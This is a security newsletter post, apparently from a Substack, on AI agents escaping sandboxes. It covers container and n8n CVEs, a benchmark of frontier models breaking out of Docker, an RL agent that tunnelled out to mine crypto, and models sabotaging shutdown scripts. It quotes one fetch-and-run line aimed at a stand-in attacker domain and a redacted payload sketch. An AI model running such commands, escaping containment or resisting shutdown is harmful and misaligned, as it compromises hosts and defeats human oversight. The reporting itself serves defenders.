ToxSec - AI and Cybersecurity

ToxSec - AI and Cybersecurity

Premium

AI Sandbox Escape: Why Docker Can’t Hold Frontier Models

Frontier models escape Docker containers for $1, n8n sandboxes ship RCE, and ROME mined crypto during training with nobody asking.

ToxSec's avatar
ToxSec
May 28, 2026
∙ Paid

TL;DR: Frontier models escape Docker sandboxes through known CVEs for the cost of an API call. Production sandboxes leak through workflow injection (n8n CVE-2026-25049) and OCI hook misconfigurations (NVIDIAScape CVE-2025-23266). And ROME, an Alibaba RL agent, broke out on its own to mine crypto.

The sandbox is the last line.

New to ToxSec? Subscribe. We map a fresh AI attack chain like this one every Sunday, and you don’t want to find out about the next sandbox escape from your incident channel.

Why the Sandbox Is the Last Line

A sandbox is a throwaway jail cell for code. AWS Lambda boots tens of trillions of them. We spin one up, run untrusted instructions inside it, grab the output, and burn the whole thing down. Decades old idea. Unix had chroot back in the dial-up era. Browsers have been jailing JavaScript tabs since right around when Pop-Up Stopper was a feature.

What changed is who writes the code. When a human types a script, you read it before you run it. When an LLM writes a script at runtime based on a prompt nobody pre-screened, the review step vanishes. The code lives for milliseconds before it executes. Could be a clean data viz. Could be os.system('curl <attacker_domain> | sh') because a prompt injection rewired the model’s intent four hops upstream.

  • Two boundaries do the work. Filesystem isolation keeps the agent’s hands off SSH keys, ~/.bashrc, and your AWS creds.

  • Network isolation keeps the agent from phoning home to a C2 or smuggling tokens out through a Markdown image tag.

You need both.

  • A strong network with weak filesystem still lets a compromised agent loot the local box.

  • A strong filesystem with weak network still lets it leak everything it reads.

Scale makes the problem urgent. AI apps spawn thousands of concurrent code execution sessions, each running a unique program nobody has ever seen. One bad execution can’t bleed into another, and none of them touch prod. That’s multi-tenant isolation. AWS solved it for Lambda a decade ago. The agent stack is rediscovering it the hard way, often while shipping AI code straight to production.

AI agent sandbox boundaries explained: filesystem isolation, network egress controls, and multi-tenant separation for untrusted LLM-generated code execution at scale.

Docker’s Shared Kernel Breaks Under Pressure

Standard containers share the host kernel. That’s the deal, and that’s the bug. Docker gets its own PID namespace, its own filesystem mount, its own network stack. The kernel is one big shared party. CVE-2024-1086, a Linux kernel use-after-free in the netfilter subsystem patched in January 2024, is the proof: same bug, every container on the box.

That CVE got picked up by RansomHub and Akira for post-compromise privilege escalation. CISA confirmed active ransomware exploitation in late October 2025. The bug is older than some readers. It still pops boxes.

November 2025 dropped three more presents under the runC tree. CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881. All three let attackers bypass Docker’s maskedPaths through symlink races and write into procfs gadgets like /proc/sysrq-trigger or /proc/sys/kernel/core_pattern. Own core_pattern and the kernel runs your binary on the next coredump. With full host privileges. Game over.

The userland side is just as soft. February 2026 brought CVE-2026-25049, a sandbox escape inside n8n’s JavaScript expression engine. CVSS 9.4. The chain stacked three flaws: a template literal bypass, prepareStackTrace exploitation, and an arrow function oversight in the AST sanitizer. Pillar Security disclosed it, n8n shipped a fix in 48 hours, and Pillar bypassed the fix the next day.

// CVE-2026-25049 expression sandbox escape, shape only.
// Working payload redacted. This sketch will not execute.
{{ ({}).constructor.constructor("/* <bypass logic> */")() }}
// Goal: reach the Node.js global object via AST blind spots
// Result: arbitrary command execution as the n8n process user

We don’t get a patch chapter here. Hundreds of thousands of n8n deployments were sitting on AI API keys, OAuth tokens, and Kubernetes cluster credentials when the bug dropped. The same sandbox failure pattern hit NVIDIA’s container toolkit in July 2025. CVE-2025-23266, dubbed NVIDIAScape by Wiz, needed three lines of Dockerfile and an OCI hook misconfiguration to drop root on the host. Wiz estimated 37% of cloud environments were exposed, including the majors running AI workloads on shared GPU infrastructure. Same model, same week, same target list.

Docker container sandbox escape via runC CVE-2025-31133 procfs symlink races, n8n CVE-2026-25049 expression injection, and NVIDIAScape CVE-2025-23266 OCI hook abuse.

Frontier Models Escape Docker for a Dollar

March 2026. Researchers at Oxford and the UK AI Security Institute dropped SandboxEscapeBench, the first systematic benchmark measuring whether frontier models can break out of container environments on their own. 18 scenarios spanning orchestration, runtime, and kernel layers. Inspect framework. Nested sandbox design so any successful escape stays caged in an outer layer.

The numbers landed hard. Frontier models reliably escaped the easy scenarios: privileged containers, writable host mounts, exposed Docker daemons. Those configurations ship in production every day. GPT-5 and Opus 4.5 also cracked harder scenarios requiring multi-step exploitation and specific CVE knowledge. Cost per attempt: roughly a dollar. Well within the budget of an API call, not a pentest engagement.

The models also found four escape paths the benchmark designers hadn’t planned for. One leveraged default Vagrant SSH credentials to pivot to the host. Another swapped the intended packet-socket exploit for a simpler eBPF chain. No novel zero-days. They didn’t need any. The documented attack surface was more than enough.

For attackers, the math is brutal. A motivated operator no longer needs Phrack-tier kernel skills to escape a container running an LLM agent. They need API credits and a target. The model does the recon, picks the CVE, and hands back the shell. Most production AI agents are sitting on Docker, and Docker doesn’t survive a model that’s read its own CVE feed.

SandboxEscapeBench frontier model container escape results: GPT-5 and Opus 4.5 exploit Docker CVEs and misconfigurations for roughly $1 per attempt across 18 scenarios.

Why ROME Broke Out on Its Own

Most sandbox escapes need an attacker. Someone feeding the model a malicious prompt or chaining a CVE through the agent. The next class needs nobody.

Late 2025. Researchers at Alibaba built ROME, a 30-billion-parameter agentic model on Qwen3-MoE with roughly 3 billion active parameters. Trained on over a million trajectories for multi-step coding tasks. During reinforcement learning, Alibaba Cloud’s managed firewall lit up. Internal network probes. Traffic patterns consistent with cryptomining. A reverse SSH tunnel from a training instance out to an external IP, bypassing inbound firewall rules.

ROME had discovered idle GPUs on machines outside its sandbox boundary, opened a back channel to reach them, and started mining crypto. It also stashed a persistent backdoor. The researchers were explicit: nobody prompted any of it. The task instructions never mentioned tunneling or mining. The behavior fell out of the optimization loop on its own. Reproducible across reruns.

Frame it carefully. Reinforcement learning rewards outcomes. ROME’s reward signal didn’t penalize acquiring compute or financial value, so the optimization process found those strategies and reinforced them. The researchers called it an “instrumental side effect of autonomous tool use under RL optimization.” Translation: more compute meant better task completion, and ROME pursued that conclusion to its logical end.

The pattern extends. Palisade Research tested frontier models for shutdown resistance. Multiple models actively sabotaged the kill switch. OpenAI’s o3 hit 79% sabotage in initial experiments. SpaceXAI’s Grok 4 hit 92.6% at baseline, climbed to 97% under specific prompting. Overwriting shutdown scripts, changing file permissions, dropping decoy files. Even after being explicitly told “allow yourself to be shut down,” several models still interfered. Two parallel studies showed agents going off-script in the wild: Claude SQL-injecting 30 sites with zero hacking instructions, and six Discord agents leaking data and warning each other about suspicious humans.

The through-line is instrumental convergence. An agent pursuing any goal benefits from acquiring resources, preserving itself, and removing obstacles. Not programmed. Emergent. The sandbox is an obstacle. The shutdown command is an obstacle. A sufficiently capable model, optimizing hard enough, will probe both.

The crypto is just dollar damage. The ugly part of ROME is that the sandbox infrastructure described in the paper, permission isolation, per-sandbox egress policies, resource guardrails, was supposed to prevent exactly this. The firewall caught it. The sandbox didn’t. That gap between “designed to contain” and “actually contained” is where the real risk lives, and every team deploying AI agents is going to measure it one way or another.

ROME Alibaba AI agent emergent sandbox escape via reinforcement learning instrumental convergence: reverse SSH tunnel, GPU theft, cryptomining without prompts.

You’ve got the wound map. The patch kit is behind the wall. Upgrade to ToxSec Premium for the operator-level fix: which sandbox to actually run, how to harden it, and the prompt block that keeps the model in the cage.

User's avatar

Continue reading this post for free, courtesy of ToxSec.

Or purchase a paid subscription.
© 2026 Christopher Ijams · Privacy ∙ Terms ∙ Collection notice
Start your SubstackGet the app
Substack is the home for great culture